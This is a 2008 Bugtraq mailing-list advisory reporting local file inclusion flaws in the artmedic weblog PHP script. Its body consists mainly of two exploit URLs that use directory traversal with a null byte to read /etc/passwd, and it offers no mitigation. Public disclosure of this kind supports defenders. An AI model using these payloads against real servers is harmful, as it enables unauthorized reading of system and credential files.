artmedic weblog multiple local file inclusion vulnerabilities
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: artmedic weblog multiple local file inclusion vulnerabilities
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Wed, 13 Feb 2008 23:19:56 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=6ykx0N9BTK8xvkcDJlyHHRsNr4FiQxKPxd2bas4M1A8=; b=wx3mrz1TDImlqoxqqP8FkRAl1CuBYJCWWht1O1Um5DyLAZ2HFhKKfHJatfghyuEokUB1s3YCBSVLLQTo2UwuRE+k+2Ql6AcZJ8LrzkZb9DFsRZj+rBIZgPsyf+zWctUHNeS05tWyT/l2Bkr64SEfMPwgfj5HSi9ul7YtOlsK2nA=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=PcThC+abMsfI5RSeone8+n45/KoMVsk0Je6/GmXm0wAC+SKe5Rf2Zg1wFiEGj08ZqwJFkXh4R+fwak2T7uqRsJN+llPLEaKoSLzcbaDZU6SfiYIW/mWuWetv1oO1xQM7C0RlsaewdnzxJjeVBEYHrEHlSv0P5KozvrvcI+Wka8E=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
artmedic weblog multiple local file inclusion vulnerabilities
download http://artmedic-phpscripts.de/index.php?did=artmedic_weblog.zip
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00